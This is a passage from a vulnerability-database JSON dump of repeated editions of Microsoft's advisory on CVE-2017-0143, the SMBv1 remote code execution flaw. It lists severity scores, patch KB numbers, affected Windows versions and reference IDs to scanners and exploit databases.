"hash": "f7b4e50f4ef2188508dc09f5f5ce8194", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0143", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-09-11T19:05:15", "history": [], "viewCount": 9, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "threatpost", "idList": ["THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:7D1D823549046978FD52257C68DF7801"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:BC214880895281474C1A8EF7B7D98C13", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:154690", "PACKETSTORM:142548", "PACKETSTORM:146236", "PACKETSTORM:142181"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41987", "EDB-ID:43970", "EDB-ID:41891"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-29702", "1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33313"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL", "700099.PRM", "700059.PRM"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA10977", "KLA11902"]}, {"type": "ics", "idList": ["ICSMA-20-170-01", "ICSMA-18-058-02"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}], "modified": "2021-09-11T11:22:34", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-09-11T11:22:34", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012217", "KB3177186", "KB3213986", "KB4012216", "KB4012214", "KB4012215", "KB4012212", "KB4012598", "KB3210721", "KB3212646", "KB4012606", "KB4013198", "KBMS16-110, 3187754", "KB3210720", "KB4013429", "KB3205401", "KB3205409", "KB4012213"], "msrc": "", "mscve": "CVE-2017-0143", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-11T19:05:15", "differentElements": ["msAffectedSoftware"], "edition": 34}, {"bulletin": {"id": "MS:CVE-2017-0143", "hash": "bdbcad436fc25396d6ee8890a5e6edb2", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0143", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-09-11T20:47:14", "history": [], "viewCount": 9, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "threatpost", "idList": ["THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:7D1D823549046978FD52257C68DF7801"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:BC214880895281474C1A8EF7B7D98C13", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:154690", "PACKETSTORM:142548", "PACKETSTORM:146236", "PACKETSTORM:142181"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41987", "EDB-ID:43970", "EDB-ID:41891"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-29702", "1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33313"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL", "700099.PRM", "700059.PRM"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA10977", "KLA11902"]}, {"type": "ics", "idList": ["ICSMA-20-170-01", "ICSMA-18-058-02"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}], "modified": "2021-09-11T11:22:34", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-09-11T11:22:34", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012215", "KBMS16-110, 3187754", "KB3212646", "KB3210720", "KB4013198", "KB4012216", "KB3205401", "KB4012598", "KB3210721", "KB4013429", "KB4012217", "KB4012606", "KB4012212", "KB4012213", "KB3205409", "KB3213986", "KB3177186", "KB4012214"], "msrc": "", "mscve": "CVE-2017-0143", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-11T20:47:14", "differentElements": ["msAffectedSoftware"], "edition": 35}, {"bulletin": {"id": "MS:CVE-2017-0143", "hash": "f7b4e50f4ef2188508dc09f5f5ce8194", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0143", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-09-11T22:53:48", "history": [], "viewCount": 9, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "threatpost", "idList": ["THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:BC214880895281474C1A8EF7B7D98C13"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"]}, {"type": "carbonblack", "idList": 